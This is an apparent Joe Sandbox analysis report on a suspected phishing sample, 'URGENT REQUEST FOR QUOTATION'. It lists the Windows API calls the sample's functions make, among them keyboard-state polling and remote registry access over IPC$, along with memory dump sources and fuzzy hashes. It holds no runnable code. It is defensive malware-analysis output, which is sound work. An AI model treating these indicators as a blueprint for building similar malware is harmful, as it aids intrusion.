                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                      • Opcode ID: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                                                      • Instruction ID: e91084eddf09d396be1db44bbc9d9849a99be5c8bc5b94296d6c8e0d83058239
                                                                                                                      • Opcode Fuzzy Hash: 69d6af0e2b6794f9bba4f85ac97cc8785739a9b7e724ef4e9a0895d87e05c03e
                                                                                                                      • Instruction Fuzzy Hash: 94316E75901129BBFB208B55DC88EFFBBBCEF56750F040169E909E2241DA349E45AAA0
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000A3D40
                                                                                                                      • _wcslen.LIBCMT ref: 000A3D6D
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 000A3D9D
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000A3DBE
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 000A3DCE
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000A3E55
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E60
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A3E6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 1149970189-3457252023
                                                                                                                      • Opcode ID: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                                                      • Instruction ID: 8abff16d66703022a1ae62329e431bc475fc74856214465efad1256fc3dbfae3
                                                                                                                      • Opcode Fuzzy Hash: dc04d6d74a1fce70ca38b5459a67b5a69ba91f8afac7a9f1ab36d4fb186e890f
                                                                                                                      • Instruction Fuzzy Hash: AE319272900209ABEB219BA0EC49FEF37BDEF89740F1041B5FA09D6161E77497448B64
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 0009E6B4
                                                                                                                        • Part of subcall function 0004E551: timeGetTime.WINMM(?,?,0009E6D4), ref: 0004E555
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009E6E1
                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0009E705
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0009E727
                                                                                                                      • SetActiveWindow.USER32 ref: 0009E746
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0009E754
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0009E773
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 0009E77E
                                                                                                                      • IsWindow.USER32 ref: 0009E78A
                                                                                                                      • EndDialog.USER32(00000000), ref: 0009E79B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                      • Opcode ID: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                                                      • Instruction ID: 47abf56792c8fe5219ffaf1bd236b0ac23ce5b827474d25e5e1fe2581e8899ee
                                                                                                                      • Opcode Fuzzy Hash: 83c500339d79cea6fa6c08803896e8ee9dda54db51e64a5dfb8f5670af2aa27f
                                                                                                                      • Instruction Fuzzy Hash: A121A5B0204285BFFF109F60EC8DE397BA9F755748F240424F949819B1DBB6AC80EB25
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0009EA5D
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0009EA73
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009EA84
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0009EA96
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0009EAA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_wcslen
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                                      • Opcode ID: e5ce0ba792a04e2faf949145f9ed9920d150d1c85fa2431357ce61d4059e1fd6
                                                                                                                      • Instruction ID: ed1417960ead08646771d537dcf41075fb1f106b10363d5dded2caf870282b51
                                                                                                                      • Opcode Fuzzy Hash: e5ce0ba792a04e2faf949145f9ed9920d150d1c85fa2431357ce61d4059e1fd6
                                                                                                                      • Instruction Fuzzy Hash: 4B117331A9425D79DB21E7A1DC4AEFF6ABCEBD1B00F400429B601A60D1EEB15E05D6B1
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00095CE2
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095CFB
                                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00095D59
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00095D69
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095D7B
                                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00095DCF
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00095DDD
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00095DEF
                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00095E31
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00095E44
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00095E5A
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00095E67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                                                      • Instruction ID: 9237768a5c4e4bc090055c9a7e91bc410634b286fbe487dc112d48c025dbc9a6
                                                                                                                      • Opcode Fuzzy Hash: 32e13e3e5984a48a1a24e355311910ce5dfceea4e7e0e450e41972716ddc633e
                                                                                                                      • Instruction Fuzzy Hash: E0510CB1A00605AFEF19CF69DD89EAEBBB5EB48301F148229F519E7290D7749E00DB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00048F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00048BE8,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048FC5
                                                                                                                      • DestroyWindow.USER32(?), ref: 00048C81
                                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00048BBA,00000000,?), ref: 00048D1B
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00086973
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869A1
                                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000,?), ref: 000869B8
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00048BBA,00000000), ref: 000869D4
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000869E6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 641708696-0
                                                                                                                      • Opcode ID: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                                                                                                      • Instruction ID: b708711d5dcd142c9c273a3fe36a910396930281fd33be29a12bfc598ebf2fbc
                                                                                                                      • Opcode Fuzzy Hash: 59058e88521bb4f40436b19b9e156708a4c6ca31db200dcc2bbb148da9c8f61e
                                                                                                                      • Instruction Fuzzy Hash: C3618F70502610EFDB35AF14D988B2D77F1FB40316F15892DE086979A0CB7AA9C0CF59
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00049862
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      • Opcode ID: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                                                                                                      • Instruction ID: d3703ca40d5d1052f4d57c946c56ec68ed54d76aedda3dbd9d73367a23782f0e
                                                                                                                      • Opcode Fuzzy Hash: 83898bba1e98336476fbe5ff62aae0cca45a9328caac1acd9ddffa782cd03ad3
                                                                                                                      • Instruction Fuzzy Hash: 32417271104640AFEB205B3DDC44FBA3BA5BB06330F284669FAA6871E5DB759C42DB24
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00099717
                                                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099720
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0007F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00099742
                                                                                                                      • LoadStringW.USER32(00000000,?,0007F7F8,00000001), ref: 00099745
                                                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00099866
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 747408836-2268648507
                                                                                                                      • Opcode ID: d00d47763a01f19d5fbf4e14c4a299e39e8f0329c752744ca08800ecb9eda74a
                                                                                                                      • Instruction ID: f0e0551166dfc316f4fbbe0cf1552beda5dc86a4a4b49c5a205eccc7b80bf91a
                                                                                                                      • Opcode Fuzzy Hash: d00d47763a01f19d5fbf4e14c4a299e39e8f0329c752744ca08800ecb9eda74a
                                                                                                                      • Instruction Fuzzy Hash: 57413972804209AADF05EBE4CE86EEEB37CAF55340F504069F60572092EF756F48DA61
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000907A2
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000907BE
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000907DA
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00090804
                                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0009082C
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00090837
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0009083C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 323675364-22481851
                                                                                                                      • Opcode ID: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                                                      • Instruction ID: fefda0516a3d790ae055f1fec539230b556ba0cc1e4c753441ef00a0b108e05a
                                                                                                                      • Opcode Fuzzy Hash: d59369ba7b689af7280d5aa1efd0b19c2b4933149e9d26bdbc5083d6c099f05f
                                                                                                                      • Instruction Fuzzy Hash: 1B413672D10229AFDF16EBA4DC85CEEB7B8BF04350F144129E945B3161EB709E04CBA0
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000B3C5C
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000B3C8A
                                                                                                                      • CoUninitialize.OLE32 ref: 000B3C94
                                                                                                                      • _wcslen.LIBCMT ref: 000B3D2D
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 000B3DB1
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 000B3ED5
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 000B3F0E
                                                                                                                      • CoGetObject.OLE32(?,00000000,000CFB98,?), ref: 000B3F2D
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 000B3F40
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000B3FC4
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3FD8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 429561992-0
                                                                                                                      • Opcode ID: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                                                      • Instruction ID: f49c25d68d58c97af2e73e69429cbfea94af3a4d45cfdb38bba1e43e42981fd1
                                                                                                                      • Opcode Fuzzy Hash: eb90cdac54766751c097a17c157e52fdb2443f778512c6cb348b8460d0dadfb8
                                                                                                                      • Instruction Fuzzy Hash: 96C144716082059FD700DF68C884DABBBE9FF89744F24492DF98A9B251DB31EE05CB52
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000A7AF3
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000A7B8F
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 000A7BA3
                                                                                                                      • CoCreateInstance.OLE32(000CFD08,00000000,00000001,000F6E6C,?), ref: 000A7BEF
                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000A7C74
                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 000A7CCC
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 000A7D57
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000A7D7A
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7D81
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 000A7DD6
                                                                                                                      • CoUninitialize.OLE32 ref: 000A7DDC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2762341140-0
                                                                                                                      • Opcode ID: eda4177956255b498769af478f38aa56dd2d9c51fe917302a41dc64a47702d99
                                                                                                                      • Instruction ID: 73cb12350039057650bf679d3b36b15a0ce8277bca33355043ee7866d4c11481
                                                                                                                      • Opcode Fuzzy Hash: eda4177956255b498769af478f38aa56dd2d9c51fe917302a41dc64a47702d99
                                                                                                                      • Instruction Fuzzy Hash: 81C13B75A04109AFDB14DFA4C884DAEBBF9FF49314F148498F81A9B262DB31ED45CB90
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0008FAAF
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 0008FB08
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0008FB1A
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0008FB3A
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0008FB8D
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 0008FBA1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0008FBB6
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 0008FBC3
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBCC
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0008FBDE
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                                                                                                      • Instruction ID: a97e2194223989f645a9aca7e3259a2aca0b4c129962010ce1b50839bd08a709
                                                                                                                      • Opcode Fuzzy Hash: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
                                                                                                                      • Instruction Fuzzy Hash: A3414075A0021A9FEB04EF64C854DFEBBB9FF48354F008069E94AA7261DB74A945CF90
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00099CA1
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00099D22
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00099D3D
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00099D57
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00099D6C
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00099D84
                                                                                                                      • GetKeyState.USER32(00000011), ref: 00099D96
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00099DAE
                                                                                                                      • GetKeyState.USER32(00000012), ref: 00099DC0
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00099DD8
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00099DEA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
